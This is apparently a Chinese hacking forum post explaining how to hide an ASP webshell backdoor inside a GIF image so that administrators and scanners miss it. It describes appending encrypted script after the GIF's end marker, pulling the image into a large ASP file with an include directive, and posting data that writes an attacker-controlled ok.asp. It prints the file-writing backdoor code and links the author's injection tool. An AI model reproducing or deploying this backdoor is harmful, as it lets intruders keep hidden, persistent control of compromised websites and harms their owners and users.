安全技术 脚本后门的深入--图片中的后门

现在从注入拿WEBSHELL看来成功率都比较高了。
拿到SHELL后，安装自己的脚本后门，常常被查杀。

脚本后门的发展史：
1。最开始就是直接放一个ASP文件上去。
2。把ASP文件加密才放上去。
3。把脚本插入到代码中去。（我经常用这种）

不过一样被查得出来，我前段时候手工检测一个站的脚本安全。
发现这个站被种了21个木马。
所以我就想到了，怎么样才能不被发现不能被查杀。

最后我研究了一下如果把脚本插入到图片中。
然后在ASP中调用图片中的脚本程序应该就可以了。

测试的时候通过了。
现在我把我的心德写一下。
让大家来分析一下。共同进步和完善这种方法。


在研究过程中我看了GIF图片的结构文档方面的书。
GIF图片都是以 00 3B 为结束的。
换句话说00 3B 后面的不会显示出来。
所以我们在00 3B后面插入代码就行了。
当然代码我们加密放到图片中去效果更好。

我写了一个程序来这么做。

这里要说一下，在图片中00 3B后面的是不会显示出来的。
但其中的代码已经运行了。图片也会正常显示出来。

测试：
在图片后面加入：<%=now%>
然后在一个ASP文件中加入:<!--include file="aaa.gif" --> 

然后你们下载这个图片，发现图片最后面变成了时间。很正常因为图片放到了ASP脚本中运行了其中的代码。

换句话来说，如果写的是一段生成文件的脚本。
那么我们提交特定的参数让图片中的代码去生成文件。
这样就实现了我们的后门。

1：这种方法要做的工作就是在目标站点中找一张GIF图片然后把代码插入到图片中，再上传到站点中去。这样作管理员很难找到木马在哪里。打死也想不到木马在图片中。
2：我们插入的代码只有一行就是那个include file .....
找个文件大点的ASP文件给插进去就行了。

然后我们在本地POST数据提交给ASP引用图片的URL这样就完成了工作。

我的插入图片的脚本：

<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% fdata = request("cyfddata") %>
<% if fdata<>"" then %>
<% syfdpath=server.mappath(Request.ServerVariables("SCRIPT_NAME"))&"\ok.asp"%>
<% Set objCountFile=objFSO.CreateTextFile(syfdapth,True) %>
<% objCountFile.Write fdata %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>

这段代码主要就是在当前目录下生成一个ok.asp文件。
文件内容是由我们提交的数据.用request("cyfddata")来获取的。

这段代码加密后插入到图片中去。
下面我把我程序的代码贴出来。（倒程序代码没有打包在里面。明天再贴上来）
现在给程序地址下载：
点这里下载测试程序。

本地自己构建一个提交表单向ASP文件提交(加入图片那个文件)
表单文本框输入内容名称是:cyfddata

后感：
我本人认为这种方法，管理员很难查到。这是我两天前想到的作出来了，
可能有些问题希望和大家一起讨论，必竞，为了追求技术就得研究技术。
共享知识，从而升华。
感觉去研究一些新东西，人活得更XS些。
利用程序
www.dv28.com/live/ScriptInpic.rar